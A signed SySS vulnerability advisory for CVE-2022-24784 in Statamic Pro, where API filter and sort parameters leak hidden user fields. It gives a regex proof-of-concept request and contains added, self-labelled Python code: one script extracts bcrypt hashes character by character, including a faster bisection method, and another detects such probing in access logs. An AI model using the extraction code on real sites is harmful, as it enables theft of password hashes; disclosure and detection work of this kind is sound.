-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-022
Product: Statamic Pro
Manufacturer: Statamic
Affected Version(s): 3.3.1 and before
Tested Version(s): 3.3.1
Vulnerability Type: Exposure of Sensitive Information Through Data Queries (CWE-202),
                    Observable Response Discrepancy (CWE-204)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2022-03-18
Solution Date: 2022-03-18
Public Disclosure: 2022-03-30
CVE Reference: CVE-2022-24784
Author of Advisory: Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Statamic is an open-source content management system (CMS) written in PHP.

The manufacturer describes the product as follows (see [3]):

"Statamic is the flat-first, Laravel + Git powered CMS designed for
building beautiful, easy to manage websites."

Due to insufficient access control in the API's filter and sorting
functionality, information about restricted fields is leaked: a filter on
a hidden attribute still decides whether a record appears in the response.
This side channel can be used by an attacker to extract sensitive
information.

The resource 'users' discloses the password hash value, thus enabling
offline password-guessing attacks on the passwords. If one user has set an
insecure password, this attack could lead to a defacement of the website
managed by Statamic and cross-site scripting attacks on its users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Pro version of Statamic provides an additional API for accessing the
content of the CMS. The API and the respective resources have to be
activated in the configuration file 'config/statamic/api.php':

    'enabled' => true,
    'resources' => [
        ...
        'users' => true,
        ...
    ],

Although the resources may limit access to a set of attributes, other
attributes can still be queried in the URL parameters 'filter' and 'sort'.
More information on these query parameters can be found in the online
documentation of Statamic 3 [2].

Specially crafted requests can disclose one character of a restricted
attribute. Repeated requests eventually reveal the complete content of
that attribute. In particular, the attribute 'password' of the resource
'/api/users' is vulnerable to that attack, disclosing the bcrypt password
hash values of the CMS users.

If one user has set an insecure password, this attack could lead to a
defacement of the website managed by Statamic and cross-site scripting
attacks on its users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP GET request can be used to check whether the bcrypt
hash of the user account with the name 'superuser' contains the capital
letter 'M' at the 5th position after the prefix '$2y$10$':

http://hostname/api/users?filter[name]=superuser&filter[password:regex]=\$2y\$10\$(%3f-i)....M................................................$

The request uses the regular expressions described in the documentation
of Statamic 3 [2]. The sequence '(%3f-i)' is the URL-encoded PCRE option
setting '(?-i)', which makes the remainder of the pattern case-sensitive;
this is required because the bcrypt alphabet distinguishes upper- and
lower-case letters.

If the regular expression matches the password hash, the response
contains the user object of the queried user:

    "data":[
        {
            "id":"c9b96376-a4ef-4257-93df-3ab78f5911dc",
            "email":"test@example.com",
            "name":"superuser",
            "is_super":true,
            "api_url":"http:\/\/project\/api\/users\/c9b96376-a4ef-4257-93df-3ab78f5911dc"
        }
    ],

Otherwise, the data array is empty:

    "data":[],

Extracting a complete user's password hash takes around one hour, as
request throttling is activated by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install version 3.3.2 or newer.
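The PoC above shows a single probe. The following Python script is an added example (not part of the SySS advisory and not Statamic code) that turns the probe into the full character-by-character extraction the advisory describes, so the cost and the role of '(?-i)' can be seen concretely. It runs offline against a constructed model of the vulnerable endpoint: 'simulated_api_users' applies every 'filter[...]' parameter to the whole user record and then strips the hidden fields from the response, which is exactly the behaviour being exploited. Two assumptions are labelled in the code: the regex filter is modelled as a PHP '/pattern/i' match that '(?-i)' switches back to case-sensitive (which is why the advisory's probe carries it), and the throttle estimate uses Laravel's default 'api' rate limit of 60 requests per minute. The user records and hashes are constructed sample data. Beyond the advisory's one-character-per-request method, the script also shows a bisection variant that probes a character class and needs six requests per position instead of up to 64.

```python
import re
import string
from urllib.parse import urlencode

# bcrypt layout: the "$2y$10$" prefix is followed by 22 salt and 31 digest
# characters from bcrypt's own base64 alphabet ("./A-Za-z0-9", 64 symbols).
BCRYPT_PREFIX = "$2y$10$"
BCRYPT_ALPHABET = "./" + string.ascii_uppercase + string.ascii_lowercase + string.digits
HASH_BODY_LEN = 53
EXPOSED_FIELDS = ("id", "email", "name", "is_super")

# Constructed sample user store (no real credentials). 'password' is the
# attribute the API response never shows but the filter still evaluates.
FAKE_USERS = [
    {"id": "sample-uuid-0", "email": "test@example.com", "name": "superuser", "is_super": True,
     "password": BCRYPT_PREFIX + "N9qoMuLO./kgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy"},
    {"id": "sample-uuid-1", "email": "editor@example.com", "name": "editor", "is_super": False,
     "password": BCRYPT_PREFIX + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"},
]

FILTER_KEY = re.compile(r"filter\[(\w+)(?::(\w+))?\]")


def simulated_api_users(query):
    """Offline model of the vulnerable /api/users endpoint: every filter is evaluated
    against the full record, then only EXPOSED_FIELDS are returned (the leak)."""
    data = []
    for user in FAKE_USERS:
        keep = True
        for key, value in query.items():
            m = FILTER_KEY.fullmatch(key)
            if not m:
                continue
            field, op = m.group(1), m.group(2) or "equals"
            actual = str(user.get(field, ""))
            if op == "equals":
                keep &= actual == value
            elif op == "regex":
                # Assumption: backend matches like PHP /pattern/i, and PCRE's (?-i)
                # turns the rest of the pattern case-sensitive (Python re has no
                # bare (?-i), so it is emulated via the flags).
                flags = 0 if "(?-i)" in value else re.IGNORECASE
                keep &= re.search(value.replace("(?-i)", ""), actual, flags) is not None
            else:
                raise ValueError(f"operator not modelled: {op}")
        if keep:
            data.append({k: user[k] for k in EXPOSED_FIELDS})
    return {"data": data}


def build_probe_regex(pos, atom, case_sensitive=True):
    """Pattern matching only if hash position `pos` (0-based, after the prefix) is
    matched by `atom`, a one-character regex such as re.escape("M") or "[A-Z]"."""
    modifier = "(?-i)" if case_sensitive else ""
    return (re.escape(BCRYPT_PREFIX) + modifier
            + "." * pos + atom + "." * (HASH_BODY_LEN - pos - 1) + "$")


def build_probe_url(base_url, username, pattern):
    """The GET request that would be sent to a live instance."""
    return base_url.rstrip("/") + "/api/users?" + urlencode(
        {"filter[name]": username, "filter[password:regex]": pattern})


def oracle(username, pattern):
    """One probe: True if the response carries the user object, False if 'data' is
    empty. Replace simulated_api_users with an HTTP GET for a real target."""
    query = {"filter[name]": username, "filter[password:regex]": pattern}
    return bool(simulated_api_users(query)["data"])


def extract_hash_linear(username, ask=oracle):
    """The advisory's method: try each alphabet symbol per position (<= 64 probes each)."""
    body, probes = "", 0
    for pos in range(HASH_BODY_LEN):
        for ch in BCRYPT_ALPHABET:
            probes += 1
            if ask(username, build_probe_regex(pos, re.escape(ch))):
                body += ch
                break
        else:
            raise RuntimeError(f"no alphabet symbol matched at position {pos}")
    return BCRYPT_PREFIX + body, probes


def extract_hash_bisect(username, ask=oracle):
    """Same oracle, fewer requests: probe a character class and halve the candidate
    set, so each position costs 6 probes instead of up to 64."""
    body, probes = "", 0
    for pos in range(HASH_BODY_LEN):
        candidates = BCRYPT_ALPHABET
        while len(candidates) > 1:
            half = candidates[: len(candidates) // 2]
            probes += 1
            # Every alphabet symbol is literal inside [...], so no escaping is needed.
            if ask(username, build_probe_regex(pos, "[" + half + "]")):
                candidates = half
            else:
                candidates = candidates[len(half):]
        body += candidates
    return BCRYPT_PREFIX + body, probes


def minutes_at_throttle(probes, per_minute=60):
    """Wall-clock cost under a per-minute limit (assumption: Laravel's default
    'api' limiter of 60/min, which fits the advisory's 'around one hour')."""
    return probes / per_minute


if __name__ == "__main__":
    print(build_probe_url("http://hostname", "superuser", build_probe_regex(4, "M")))
    for method in (extract_hash_linear, extract_hash_bisect):
        recovered, n = method("superuser")
        print(f"{method.__name__}: {recovered} after {n} probes "
              f"(~{minutes_at_throttle(n):.0f} min at 60 req/min)")
```

The linear method needs up to 53 * 64 = 3392 probes, which at 60 requests per minute is close to the hour the advisory reports; the bisection variant needs exactly 53 * 6 = 318. Dropping 'case_sensitive' shows the pitfall the '(?-i)' modifier avoids: under a case-insensitive match, probing 'm' reports a hit for a position that actually holds 'M', and the recovered hash would be wrong.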
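Until the upgrade is rolled out, the probing pattern is visible in the web server's access log: many requests to '/api/users' from one client whose 'filter' or 'sort' parameters name an attribute the resource does not expose. The following Python detection is an added example (not part of the advisory) that runs over constructed combined-format log lines embedded in the script; the set of attributes treated as legitimately exposed is an assumption taken from the PoC response and should be replaced with the fields your own users resource returns.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: these are the only attributes the users resource is meant to expose
# (taken from the PoC response). A filter or sort on anything else probes hidden data.
ALLOWED_USER_FIELDS = {"id", "email", "name", "is_super", "api_url"}

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
FILTER_KEY_RE = re.compile(r"^filter\[(\w+)(?::\w+)?\]$")

# Constructed sample access-log lines, not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Mar/2022:10:00:01 +0000] "GET /api/users?filter[name]=superuser&filter[password:regex]=%5C%242y%5C%2410%5C%24(%3F-i)....M....%24 HTTP/1.1" 200 312
203.0.113.7 - - [30/Mar/2022:10:00:02 +0000] "GET /api/users?filter[name]=superuser&filter[password:regex]=%5C%242y%5C%2410%5C%24(%3F-i)....N....%24 HTTP/1.1" 200 12
198.51.100.4 - - [30/Mar/2022:10:00:03 +0000] "GET /api/users?filter[name]=editor HTTP/1.1" 200 300
198.51.100.4 - - [30/Mar/2022:10:00:04 +0000] "GET /api/collections/pages/entries?sort=-date HTTP/1.1" 200 4096
203.0.113.7 - - [30/Mar/2022:10:00:05 +0000] "GET /api/users?sort=-password HTTP/1.1" 200 600
"""


def hidden_fields_in_query(target):
    """Return the non-exposed user attributes a request filters or sorts on."""
    parts = urlsplit(target)
    if not parts.path.startswith("/api/users"):
        return set()
    probed = set()
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        m = FILTER_KEY_RE.match(key)
        if m:
            probed.add(m.group(1))
        elif key == "sort":
            # sort accepts comma-separated fields, "-" prefix for descending order
            for v in values:
                probed.update(f.lstrip("-") for f in v.split(",") if f)
    return probed - ALLOWED_USER_FIELDS


def find_probing_clients(log_text):
    """Group requests that touch hidden user attributes by client address."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        fields = hidden_fields_in_query(m.group("target"))
        if fields:
            entry = report.setdefault(m.group("ip"), {"requests": 0, "fields": set()})
            entry["requests"] += 1
            entry["fields"] |= fields
    return report


if __name__ == "__main__":
    for ip, info in find_probing_clients(SAMPLE_LOG).items():
        print(f"{ip}: {info['requests']} request(s) probing {sorted(info['fields'])}")
```

A single such request is already worth an alert, since no legitimate API client has a reason to filter or sort users by 'password'; the per-client count distinguishes a one-off from an extraction run, which at the default throttle shows up as a steady stream of roughly one request per second for about an hour.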
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-03-16: Vulnerability discovered
2022-03-18: Vulnerability reported to manufacturer
2022-03-18: Patch released by the manufacturer
2022-03-25: CVE-2022-24784 assigned
2022-03-30: Public disclosure of the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Statamic 3 documentation for the REST API
    https://statamic.dev/rest-api
[2] Statamic 3 documentation for filter conditions
    https://statamic.dev/conditions
[3] Product website for Statamic
    https://statamic.com
[4] SySS Security Advisory SYSS-2022-022
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-022.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB645 7D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmJBd3oACgkQ6ceYZrZF
fXpjxQ/+LWo2BEYHq4lLkMWlb+Ul3OM90gBfuj/1kHmsKdEHTRYEETmszyfGYw9O
E0rRYukMtD8uRVBusjtCgGuCo4KjrA73iahUteaTfS2aO+5sjErg8nhFKdvzAcxt
tgHrSxzVnkBL5r6z1SU0lK5aS56pVb3ZEeBv6/HIsM8w4XKRtZGX+1dCTzpaJkVG
l0OaLhI45hCG9oVKPcJsb1qLxPKmMxkrxEagWzurVAfMpJ6Dgecj8nzArifbf2Od
/MA+0b+lHJR5uHbaRSl/PSc04R5JXhbvdzKZr7FX8/VgJhae8rb1vLA9F7D+AqYV
qEtQ1NzAMMQg4DEdo4gpgcxQcXspHq87rAoRsNprA+zik+J5Kj4bP7CpqtQAHWRb
WhnVnbkvAYKoNYLTSFP9fH2D+kQFh+AsdMq5NP5Uykxrbyi+070NxnH0KhMFlebY
pGI3CUl3HxUnCnd0VY87YNfyjXXsYbFvhZxFvlIpjkRXeEyUc7pjtvZ14givrYd4
qhDE5ahMpqNFSGLNzcU/DMOhDE0/u0ezYqNOB8WZuqUivVVXMRhEg5hGjxX+F02/
Cywm6xuEQFo4VIYBS6VFEVKSiz0ceXWNmWxTF6VXqxnDegKXQvueZiwZVD0dDT6W
RwKKk1A10v/zNG2h95NOL80OnZzUDZYB0LmOwB9LEdWW9ZAJj9k=
=dlSj
-----END PGP SIGNATURE-----